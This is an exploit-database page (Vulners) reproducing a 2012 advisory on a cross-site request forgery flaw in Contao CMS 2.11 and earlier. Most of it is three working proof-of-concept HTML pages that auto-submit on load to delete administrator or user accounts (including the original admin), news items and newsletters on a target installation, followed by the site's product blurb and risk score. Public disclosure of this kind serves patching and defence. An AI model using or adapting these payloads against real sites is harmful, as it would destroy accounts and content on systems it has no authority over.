Vulners
Lucene search
ContaoCMS (aka TYPOlight) <= 2.11 CSRF (Delete Admin - Delete Article)
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : ContaoCMS (aka TYPOlight) <= 2.11 CSRF (Delete Admin- Delete Article)
# Date : 25-02-2012
# Author : Ivano Binetti (http://ivanobinetti.com)
# Software link : http://www.contao.org/en/download.html
# Vendor site : http://www.contao.org
# Version : 2.11.0 (latest) and lower
# Tested on : Debian Squeeze (6.0)
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[Multiple Vulnerabilities by Ivano Binetti]-------------------------------------------+
Summary
1)Introduction
2)Vulnerabilities Description
2.1 Delete Administrators or Users
2.2 Delete News
2.3 Delete Newsletter
+--------------------------------------------------------------------------------------------------------------------------------+
1)Introduction
Contao (fka TYPOlight) is "an open source content management system (CMS) for people who want a professional internet presence that
is easy to maintain".
2)Vulnerabilities Description
Contao 2.11 (and lower) is affected by CSRF Vulnerability which allows an attacker to delete admins/users, delete web pages
(articles, news, newsletter and so on).
2.1 Delete Administrators or Users
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to delete ADMIN/USER account</H2>
<form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=user&act=delete&id=2">
</body>
</html>
Note that the is possible to delete any admin/user, also the first administrator (id=1) created during Contao's installation phase.
2.2 Delete News
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to delete News</H2>
<form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=news&act=delete&id=1">
</form>
</body>
</html>
2.3 Delete Newsletter
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to delete Newsletter</H2>
<form method="POST" name="form0" action="http://<contao_ip>:80/contao/contao/main.php?do=newsletter&act=delete&id=1">
</form>
</body>
</html>
+--------------------------------------------------------------------------------------------------------------------------------+
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1